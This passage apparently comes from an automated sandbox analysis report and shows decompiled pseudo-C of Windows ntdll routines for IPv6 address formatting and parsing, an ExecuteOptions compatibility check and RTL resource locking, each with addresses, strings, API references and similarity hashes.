							L33:
							_t115 = 0x732926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00767707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x739cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00767707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00767707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00767707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00767707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x007713d5
0x007713d9
0x007713dc
0x007713de
0x007713e1
0x007713e8
0x007713ee
0x0079e8fd
0x00000000
0x0079e921
0x0079e921
0x0079e928
0x0079e982
0x0079e98a
0x00000000
0x0079e99a
0x0079e99e
0x0079e9a3
0x0079e9a8
0x0079e9b9
0x0079e978
0x00000000
0x0079e978
0x0079e98a
0x0079e92a
0x0079e931
0x0079e944
0x0079e944
0x0079e950
0x0079e954
0x0079e959
0x0079e95e
0x0079e963
0x0079e970
0x00000000
0x0079e975
0x0079e93b
0x0079e980
0x00000000
0x0079e980
0x0079e942
0x0079e94b
0x00000000
0x0079e94b
0x00000000
0x0079e942
0x007713f4
0x007713f4
0x007713f9
0x007713fc
0x007713ff
0x00771406
0x0079e9cc
0x0079e9d2
0x0079e9d2
0x0079e9cc
0x0077140c
0x00771411
0x00771431
0x0077143a
0x0077143c
0x0077143f
0x0077143f
0x00771442
0x00771447
0x007714a8
0x007714ac
0x0079e9e2
0x0079e9e7
0x0079e9ec
0x0079ea05
0x0079ea05
0x00000000
0x00771449
0x00000000
0x00771449
0x0077144c
0x00771459
0x00771462
0x00771469
0x0077146a
0x00771470
0x00771473
0x00771476
0x00771476
0x00771490
0x00771495
0x0077138e
0x00771390
0x00771397
0x00771398
0x00771399
0x007713a1
0x007713a4
0x007713a4
0x00771498
0x0077149c
0x0077149f
0x007714a2
0x00000000
0x00000000
0x007714a4
0x00000000
0x007714a4
0x00771413
0x00771415
0x00771416
0x00771419
0x0077141c
0x00771422
0x007713b7
0x007713bc
0x007713bf
0x007713bf
0x007713c2
0x00771424
0x00771424
0x00771424
0x00771427
0x0077142b
0x0077142c
0x0077142c
0x0077142c
0x00000000
0x0077141c
0x00771411

APIs

___swprintf_l.LIBCMT ref: 0077146B
___swprintf_l.LIBCMT ref: 00771490
___swprintf_l.LIBCMT ref: 0079E970

Strings

::%hs%u.%u.%u.%u, xrefs: 0079E967
:%u.%u.%u.%u, xrefs: 0079E9F4
::ffff:0:%u.%u.%u.%u, xrefs: 0079E9B0
ffff:, xrefs: 0079E94B

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
Instruction ID: a592f67da5e6c95447368361a62582baff0230017c4683c62d1ce5317f2ce97e
Opcode Fuzzy Hash: 59c23085ba10354ed0dbefd77a867b06506bf85c047e00b519c9bda4d0c4d4ad
Instruction Fuzzy Hash: A96137B1900655EADF34CF5DC8808BE7BB5EF94300B94C52DF99A47641D27CAA40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00767EFD, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00767EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x812088; // 0x775ba0a1
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00767F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00783F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0073DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x814218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00783F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00740D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00783F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00748375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00783F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E007AE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00783F92();
					_t38 = 1;
					L2:
					return E0073E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00767f08
0x00767f0f
0x00767f12
0x00767f1b
0x00767f31
0x00783ead
0x00783eb4
0x00000000
0x00000000
0x00783eba
0x00783ecd
0x00783ed2
0x00783ee1
0x00783ee7
0x00783eec
0x00783f12
0x00783f18
0x00783f1a
0x00000000
0x00000000
0x00783f20
0x00783f26
0x00783f28
0x00000000
0x00000000
0x00783f2e
0x00783f30
0x00000000
0x00000000
0x00783f3a
0x00783f3b
0x00783f53
0x00783f64
0x00783f69
0x00783f6c
0x00783f6d
0x00783f6f
0x0078e304
0x0078e30f
0x0078e315
0x0078e31e
0x0078e321
0x0078e327
0x0078e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0078e32f
0x0078e32f
0x0078e337
0x0078e33a
0x0078e33b
0x0078e33d
0x0078e33f
0x0078e341
0x0078e341
0x0078e34e
0x0078e353
0x0078e358
0x0078e35d
0x0078e35f
0x00000000
0x00000000
0x0078e365
0x0078e365
0x0078e368
0x0078e36e
0x00000000
0x00000000
0x0078e374
0x0078e32f
0x00783f75
0x00783f7a
0x00783f7c
0x00783f7e
0x00783f86
0x00767f39
0x00767f47
0x00767f47
0x00767f37
0x00767f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00783F12

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00783EC4
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0078E2FB
ExecuteOptions, xrefs: 00783F04
P&#, xrefs: 00767F1E
CLIENT(ntdll): Processing section info %ws..., xrefs: 0078E345
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00783F75
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00783F4A
Execute=1, xrefs: 00783F5E

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$P&#
API String ID: 3901378454-2995074170
Opcode ID: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
Instruction ID: 30286a2fc8b3622a829d088f6c0825a0d86035c3761885e44a4e3d126e91a33d
Opcode Fuzzy Hash: 8c3e7fdc5723d0e96eb76f8360080767cb1f7082ea6d171203cbb11717abd005
Instruction Fuzzy Hash: 2641AD7168061CFADB20AE54DCCAFDA73BCAF54714F000595B605E6092EB789B46CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00770B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00770B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00748980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0073DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00770CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00770CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E007706BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E007706BA(_t135, _t178) == 0 || E00770A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00770CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00770CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E007706BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E007706BA(_t124, _t142) == 0 || E00770A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00770b21
0x00770b24
0x00770b27
0x00770b2a
0x00770b2d
0x00770b30
0x00770b33
0x00770b36
0x00770b39
0x00770b3e
0x00770c65
0x00770c68
0x00770c6a
0x00770c6f
0x0079eb42
0x00000000
0x00000000
0x0079eb48
0x0079eb48
0x00770c75
0x00770c7a
0x0079eb54
0x00000000
0x00000000
0x00000000
0x0079eb5a
0x00770c80
0x00770c84
0x0079eb98
0x00000000
0x00000000
0x0079eba6
0x00770cb8
0x00770cba
0x00770cd3
0x00770cda
0x00770ce4
0x00770ce9
0x00000000
0x00770cec
0x00770c8c
0x0079eb63
0x00000000
0x00000000
0x0079eb70
0x0079eb75
0x0079eb7d
0x00000000
0x00000000
0x0079eb8c
0x00000000
0x0079eb8c
0x00770c96
0x00000000
0x00000000
0x00770ca2
0x00770cac
0x00770cb4
0x00000000
0x00000000
0x00770b44
0x00770b47
0x00770b49
0x00000000
0x00000000
0x00770b4f
0x00770b50
0x00000000
0x00000000
0x00770b56
0x00770b62
0x00770b7c
0x00770bac
0x00770a0f
0x0079eaaa
0x00000000
0x0079eac4
0x0079eac4
0x00770bd0
0x00770bd0
0x00770bd4
0x00770bd9
0x00000000
0x00000000
0x00770bdb
0x00770be0
0x0079eb0e
0x00770a1a
0x00000000
0x00770a1a
0x0079eb1a
0x0079eb1f
0x0079eb27
0x00000000
0x00000000
0x0079eb36
0x00000000
0x0079eb36
0x00770bea
0x00000000
0x00000000
0x00770bf6
0x00770c00
0x00770c03
0x00770c0b
0x00000000
0x00770c0b
0x0079eaaa
0x00000000
0x00770a15
0x00770bb6
0x00000000
0x00770bc6
0x00770bc6
0x00770bcb
0x00770c15
0x00000000
0x00000000
0x00770c1d
0x00770c20
0x00770c21
0x00770c24
0x00770c24
0x00770c26
0x00000000
0x00770c26
0x00770bcd
0x00000000
0x00770bcd
0x00770b89
0x00770b89
0x00770b90
0x00000000
0x00000000
0x00770b96
0x00000000
0x00770b96
0x00770a04
0x00770a04
0x00770b9a
0x00770b9a
0x00770b9b
0x00770b9f
0x00000000
0x00000000
0x00000000
0x00770ba5
0x00770ac7
0x00770aca
0x0079eacf
0x00000000
0x0079eade
0x0079eade
0x0079eae3
0x00000000
0x00000000
0x0079eaf3
0x0079eaf6
0x0079eaf7
0x0079eafe
0x0079eb01
0x00000000
0x0079eb01
0x0079eacf
0x00770ad0
0x00770ad4
0x00000000
0x00000000
0x00770ada
0x00770ae6
0x00770c34
0x00000000
0x00770c47
0x00770c49
0x00770c4a
0x00770c4e
0x00770c51
0x00770c54
0x00770c57
0x00770c5a
0x00000000
0x00000000
0x00000000
0x00770c60
0x00770afb
0x00770afe
0x00770b02
0x00770b05
0x00770b08
0x00000000
0x00770b08
0x00770ae6
0x00770b44
0x007709f8
0x007709f8
0x007709f9
0x00000000
0x00000000
0x0079eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00770BF6
__fassign.LIBCMT ref: 00770CA2

Strings

., xrefs: 00770A0C
:, xrefs: 00770BA9
:, xrefs: 00770AC7

Memory Dump Source

Source File: 0000000B.00000002.2147089917.0000000000720000.00000040.00000001.sdmp, Offset: 00710000, based on PE: true

Associated: 0000000B.00000002.2147040566.0000000000710000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2147830919.0000000000800000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2148032311.0000000000810000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2177331659.0000000000814000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2178234423.0000000000817000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2179037101.0000000000820000.00000040.00000001.sdmp Download File
Associated: 0000000B.00000002.2196223654.0000000000880000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: d5d01b3d71e993e05c5a94f67dae0f804c7ecfa9f38d3ef88ee363e3ccdcc407
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 79A19D7190030AEFCF25CF64C8556FEB7B4AF15384F24C56AD84AA7282D6389A41CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00770554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00770554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008101c0;
									_push(_t144);
									_push(0);
									_t51 = E0072F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E00774FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E00783F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E00783F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E007B217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00783F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00773915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x008101c0;
												_push(_t138);
												_push(0);
												_t58 = E0072F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E00774FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E00783F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E00783F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E007B217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E00783F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00773915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00755384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0072F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00773915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0072F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00773915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0072F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00773915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00755329(_t110, _t138);
																return E007553A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
